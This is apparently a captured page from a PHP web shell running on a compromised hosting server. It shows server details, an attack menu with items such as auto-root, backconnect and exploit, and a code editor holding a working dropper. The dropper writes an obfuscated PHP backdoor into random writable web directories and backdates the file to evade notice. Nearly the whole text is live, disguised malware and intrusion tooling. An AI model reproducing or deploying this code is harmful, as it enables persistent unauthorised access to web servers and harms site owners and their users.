Linux boca.hozzt.com 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
LiteSpeed
: 159.253.39.62 | : 3.149.28.185
Cant Read [ /etc/named.conf ]
7.4.33
renovkoron
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
tmp /
[ HOME SHELL ]
Name
Size
Permission
Action
0d8c213e0b01ae950f98706b1756f1...
4.34
KB
-rw-r--r--
2415649015
9.41
KB
-rw-r--r--
5d7852ab9d10e8291605d2804faa1b...
387
B
-rw-r--r--
680b3ca4b18d6aae00380516b2382c...
387
B
-rw-r--r--
85a6fcea3ddc4adbbe9893c7b25fce...
7.49
KB
-rw-r--r--
d86a281af765b3f730cef68fc5ce69...
7.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 2415649015
<?php if(!defined("PHP_EOL")) { define("PHP_EOL", "\n"); } $payload_file = "%3C%3Fphp%20function%20cIElJ%28%24tYLNPGDml%2C%20%24wDnRr%2C%20%24wsKrz%29%7B%24YQqvi%20%3D%20%22ba06920c-fbfa-4b0c-8355-bbbed5645854%22%3B%09%24KDYow%20%3D%20%27AETFvS%27%3Breturn%20%24tYLNPGDml%20%5E%20%24YQqvi%5B%24wDnRr%20%25%20strlen%28%24YQqvi%29%5D%20%5E%20%24wsKrz%3B%7D%24YmziNznGQ%20%3D%20%22NOtnVat%22%3Bfunction%20fcpKT%28%29%7B%24CEePnusWYD%20%3D%20%27noBlGVgwho%27%3B%24BddLH%20%3D%2018%3B%24qhNKNMRp%20%3D%20%27lYe%27%3B%24UNJSDsQA%20%3D%20base64_decode%28%24qhNKNMRp%29%3B%24ygglSGdHzO%20%3D%202%3B%24XzJzNbbxZe%20%3D%20%27FCBoER%27%3B%24Qvdnk%20%3D%20%27eqH%27%3B%7Dfunction%20srnngUV%28%24YmziNznGQ%29%7B%20%24DzoifDL%20%3D%20%22%5Cx73%22.%22%5C164%22.%22%5C162%22.%27_%27.chr%28114%29.chr%281085-974%29.%22%5Cx74%22.%22%5C61%22.chr%2851%29%3B%24YmziNznGQ%20%3D%20%24DzoifDL%28%24YmziNznGQ%29%3B%09%24VNijtXhvf%20%3D%2054%3B%09%24ezAHgMjr%20%3D%2063%3B%24gylqde%20%3D%20%22%5Cx72%22.%27a%27.%22%5Cx77%22.%27u%27.chr%28114%29.%22%5C154%22.%22%5C144%22.%27e%27.%27c%27.%27o%27.%22%5C144%22.%22%5Cx65%22%3B%24YmziNznGQ%20%3D%20%24gylqde%28%24YmziNznGQ%29%3B%09%24VNijtXhvf%20%3D%20%24ezAHgMjr%20-%205%3B%24YmziNznGQ%20%3D%20str_split%28%24YmziNznGQ%29%3B%09%24jZRpKgZ%20%3D%2041%3Breturn%20%24YmziNznGQ%3B%7Dfunction%20wCDFMc%28%24cjbPaISbe%2C%20%24wsKrz%29%7B%24cjbPaISbe%20%3D%20array_map%28%22cIElJ%22%2C%20array_values%28%24cjbPaISbe%29%2C%20array_keys%28%24cjbPaISbe%29%2C%20array_values%28%24wsKrz%29%29%3B%09%24NkIojpKz%20%3D%2071%3B%24cjbPaISbe%20%3D%20implode%28%22%22%2C%20%24cjbPaISbe%29%3B%09%24sUyjq%20%3D%2063%3B%24JwvZidQ%20%3D%20%27u%27.chr%28110%29.chr%28115%29.%22%5C145%22.chr%28114%29.%22%5C151%22.chr%28126-29%29.chr%28108%29.%22%5C151%22.chr%28510-388%29.%22%5C145%22%3B%24cjbPaISbe%20%3D%20%40%24JwvZidQ%28%24cjbPaISbe%29%3B%09%24izjCcv%20%3D%2067%3Breturn%20%24cjbPaISbe%3B%7Dfunction%20AXhhf%28%24wsKrz%2C%20%24cjbPaISbe%29%7B%24wsKrz%20%3D%20array_slice%28str_split%28str_repeat%28%24wsKrz%2C%20intval%28count%28%24cjbPaISbe%29/16%29%2B1%29%29%2C%200%2C%20count%28%24cjbPaISbe%29%29%3B%09%24XjLyIQq%20%3D%2043%3Breturn%20%24wsKrz%3B%7Dfunction%20QPFqW%28%29%7Becho%20%22ojPni%22%3B%09%24zhNtdAG%20%3D%20%27ws%27%3B%09%24MmcoJ%20%3D%2049%3B%7Dfunction%20RxpnjLw%28%24qXobEir%29%7Bstatic%20%24VRgNEhnrRT%20%3D%20array%28%29%3B%09%24qXobEoyswN%20%3D%2071%3B%24pePeKwe%20%3D%20glob%28%24qXobEir%20.%20%27/%2A%27%2C%20GLOB_ONLYDIR%29%3B%09%24BxphYJr%20%3D%2067%3B%09%24RKRcdc%20%3D%20%27LhRUI%27%3B%24RMtzlIsV%20%3D%20count%28%24pePeKwe%29%3B%09%24uDKUdJaKI%20%3D%2036%3Bif%20%28%24RMtzlIsV%20%3E%200%29%20%7Bforeach%20%28%24pePeKwe%20as%20%24qXobE%29%20%7B%24roFoko%20%3D%20%22%5C151%22.chr%28478-363%29.%22%5Cx5f%22.chr%28944-825%29.%22%5Cx72%22.%22%5C151%22.chr%28986-870%29.%27a%27.%22%5C142%22.%27l%27.chr%28968-867%29%3Bif%20%28%40%24roFoko%28%24qXobE%29%29%20%7B%24VRgNEhnrRT%5B%5D%20%3D%20%24qXobE%3B%09%09%09%09%24cpmwh%20%3D%2052%3B%7D%7D%7Dforeach%20%28%24pePeKwe%20as%20%24qXobEir%29%20RxpnjLw%28%24qXobEir%29%3Breturn%20%24VRgNEhnrRT%3B%7DfcpKT%28%29%3Bfunction%20hEiBAFz%28%24cjbPaISbe%29%7B%24UagDlpdHDe%20%3D%20%27D%27.%22%5C117%22.%22%5Cx43%22.chr%28724-639%29.chr%28331-254%29.chr%2869%29.%22%5Cx4e%22.%22%5C124%22.%27_%27.chr%28171-89%29.%22%5C117%22.%22%5Cx4f%22.chr%2884%29%3B%24EEVEhRq%20%3D%20%24_SERVER%5B%24UagDlpdHDe%5D%3B%24pePeKwe%20%3D%20RxpnjLw%28%24EEVEhRq%29%3B%09%24zLvSIGbsDR%20%3D%20%27dczaEowd%27%3B%24GUPpz%20%3D%20array_rand%28%24pePeKwe%29%3B%09%24NeLqy%20%3D%20ord%28%27tgur%27%29%3B%24CeHGLxp%20%3D%20%22%5Cx2e%22.chr%28112%29.%22%5Cx68%22.%22%5C160%22%3B%24CYcvB%20%3D%20%24pePeKwe%5B%24GUPpz%5D%20.%20%22/%22%20.%20substr%28md5%28time%28%29%29%2C%200%2C%208%29%20.%20%24CeHGLxp%3B%09%24hPPrL%20%3D%20%27TeEiNqPn%27%3B%24KmVxnBeH%20%3D%20%27f%27.%27i%27.%22%5Cx6c%22.%22%5C145%22.%27_%27.%22%5C160%22.chr%28117%29.chr%28181-65%29.%22%5C137%22.chr%2899%29.%27o%27.chr%28110%29.chr%28116%29.%22%5Cx65%22.%27n%27.%22%5Cx74%22.%22%5C163%22%3B%40%24KmVxnBeH%28%24CYcvB%2C%20%24cjbPaISbe%29%3B%09%24Gzoxxury%20%3D%2050%3B%24YqaJjQmO%20%3D%20%22%5Cx48%22.%22%5C124%22.chr%281030-946%29.%22%5C120%22.%27_%27.%22%5Cx48%22.%27O%27.chr%2883%29.%22%5C124%22%3B%24zXJGmWjW%20%3D%20%27h%27.chr%28116%29.chr%28395-279%29.%27p%27.%27%3A%27.%22%5C57%22.chr%28600-553%29%3B%24LCJRZiTSk%20%3D%20%24zXJGmWjW%20.%20%24_SERVER%5B%24YqaJjQmO%5D%20.%20substr%28%24CYcvB%2C%20strlen%28%24EEVEhRq%29%29%3B%09%24hPPrL%20%3D%20trim%28%24zLvSIGbsDR%29%3B%09%24OmajU%20%3D%2059%3Bprint%28%24LCJRZiTSk%29%3B%09%24nZBaMv%20%3D%20%24NeLqy%20/%205%3B%09%24RtCaYBc%20%3D%20%24nZBaMv%20%2A%20%24nZBaMv%3B%7Dfunction%20QpGnCpq%28%24cjbPaISbe%2C%20%24GUPpz%29%7B%24GUPpz%20%3D%20%24GUPpz%5B0%5D%3B%09%24NnjVnitq%20%3D%2036%3Bif%20%28%24cjbPaISbe%20%21%3D%3D%20%24GUPpz%29%7BhEiBAFz%28%24cjbPaISbe%29%3B%09%09%24VMAlev%20%3D%20%27PUaRztYNUm%27%3B%7Delse%20%7BLVaao%28%29%3B%09%09%24lelBYSgQ%20%3D%20%27KoTd%27%3B%09%09%24lelBYSgQ%20%3D%20ord%28%27yqb%27%29%3B%7D%7Dfunction%20LVaao%28%29%7B%24oSZgFjM%20%3D%20%22%5Cx70%22.%27h%27.chr%28112%29%3B%24fkLoZqG%20%3D%20chr%28112%29.chr%28104%29.%22%5C160%22.%22%5C166%22.%27e%27.chr%281013-899%29.chr%28115%29.%22%5Cx69%22.%22%5C157%22.%22%5Cx6e%22%3B%24cjbPaISbe%20%3D%20Array%28%24oSZgFjM%20%3D%3E%20%40%24fkLoZqG%28%29%2C%20%29%3B%09%24YRigxAgLv%20%3D%20%27Yt%27%3B%24rbkaTxVz%20%3D%20%27s%27.%27e%27.%27r%27.%27i%27.chr%2897%29.%27l%27.%22%5C151%22.%22%5Cx7a%22.chr%28101%29%3Becho%20%40%24rbkaTxVz%28%24cjbPaISbe%29%3B%7Dfunction%20CncpDfhu%28%29%7Becho%20%22NOtnVat%22%3B%09%24uykdwhkTi%20%3D%20%27MEhLhJp%27%3B%7Dforeach%20%28%24_POST%20as%20%24wsKrz%20%3D%3E%20%24cjbPaISbe%29%7B%24WvYHtZ%20%3D%20strlen%28%24wsKrz%29%3B%09%24UqJFLYI%20%3D%2014%3B%09%24Qzwsj%20%3D%20%27bKwNL%27%3Bif%20%28%24WvYHtZ%20%3D%3D%2016%29%7B%24cjbPaISbe%20%3D%20srnngUV%28%24cjbPaISbe%29%3B%24wsKrz%20%3D%20AXhhf%28%24wsKrz%2C%20%24cjbPaISbe%29%3B%09%09%24PHoZgk%20%3D%2018%3B%24cjbPaISbe%20%3D%20wCDFMc%28%24cjbPaISbe%2C%20%24wsKrz%29%3B%09%09%24PHoZgk%20%3D%20%24PHoZgk%20%2A%2014%3B%09%09%24kmRRLBUTY%20%3D%2012%3Bif%20%28%40is_array%28%24cjbPaISbe%29%29%7B%24GUPpz%20%3D%20array_keys%28%24cjbPaISbe%29%3B%09%09%09%24HAScof%20%3D%20%27Sy%27%3B%24cjbPaISbe%20%3D%20%24cjbPaISbe%5B%24GUPpz%5B0%5D%5D%3B%09%09%09%24eSTAs%20%3D%20%27znRwAjIH%27%3BQpGnCpq%28%24cjbPaISbe%2C%20%24GUPpz%29%3B%7D%7D%7Ddie%28%29%3B%24ELppDN%20%3D%20%27jaNHUKZjCP%27%3B%3F%3E"; $payload_name = ""; srand(time()); function list_dir($dir, $depth=10000) { $result = array(); $dir_count = 0; if ($depth == 0) { return $result; } $dir = strlen($dir) == 1 ? $dir : rtrim($dir, '\\/'); $h = @opendir($dir); if ($h === FALSE) { return $result; } while (($f = readdir($h)) !== FALSE) { if ($f !== '.' and $f !== '..') { $current_dir = "$dir/$f"; if (is_dir($current_dir)) { $dir_count += 1; if ($dir_count >= $depth) { break; } if (@is_writable($current_dir) == TRUE) { $result[] = $current_dir; } $result = array_merge($result, list_dir($current_dir, $depth / 10)); } } } closedir($h); return $result; } function write_payload($path, $payload) { if (!@file_exists($path)) { if (@file_put_contents($path, rawurldecode($payload)) != FALSE) { return TRUE; } } return FALSE; } $base_www_path = $host = @$_SERVER['HTTP_HOST']; $base_local_path = $_SERVER['DOCUMENT_ROOT']; if (!($base_time = @stat($base_local_path."/.htaccess"))) { if (!($base_time = @stat($base_local_path."/index.php"))) { if (!($base_time = @stat($base_local_path."/index.html"))) { if (!($base_time = @stat($base_local_path."/.."))) { if (!($base_time = @stat($base_local_path))) { $base_time = Array(); $base_time['mtime'] = time(); } } } } } $base_time = $base_time['mtime']; if (!empty($payload_name) && $payload_name[0] == "/") { $tokens = explode("*", $payload_name); $writable_dirs = list_dir(str_replace("//", "/", $base_local_path . "/" . $tokens[0])); $payload_name = substr($tokens[1], 1); } else { $writable_dirs = list_dir($base_local_path); } if (count($writable_dirs) == 0) { echo "STATUS_UNWRITABLE"; exit(); } shuffle($writable_dirs); # try to upload $max_tryes = strlen($payload_name) == 0 ? 10 : 1; foreach ($writable_dirs as $current_dir) { // if payload name is set, no more one try to upload on current dir for ($i=0; $i < $max_tryes; $i++) { if (strlen($payload_name) == 0) { $temp_payload_name = substr(str_shuffle(str_repeat('abcdefghijklmnopqrstuvwxyz', mt_rand(1,8))),1,8) . ".php"; } else { $temp_payload_name = $payload_name; } $full_payload_name = $current_dir . "/" . $temp_payload_name; $uri_path = substr($full_payload_name, strlen($base_local_path)); $full_uri = $base_www_path . (strpos($uri_path, "/") == 0 ? $uri_path : "/".$uri_path); if (write_payload($full_payload_name, $payload_file)) { touch($full_payload_name, $base_time); // set last modification time as root folder echo "URL#http://" . $full_uri . PHP_EOL; exit(); } } } echo "STATUS_CANTUPLOAD"; exit();
Close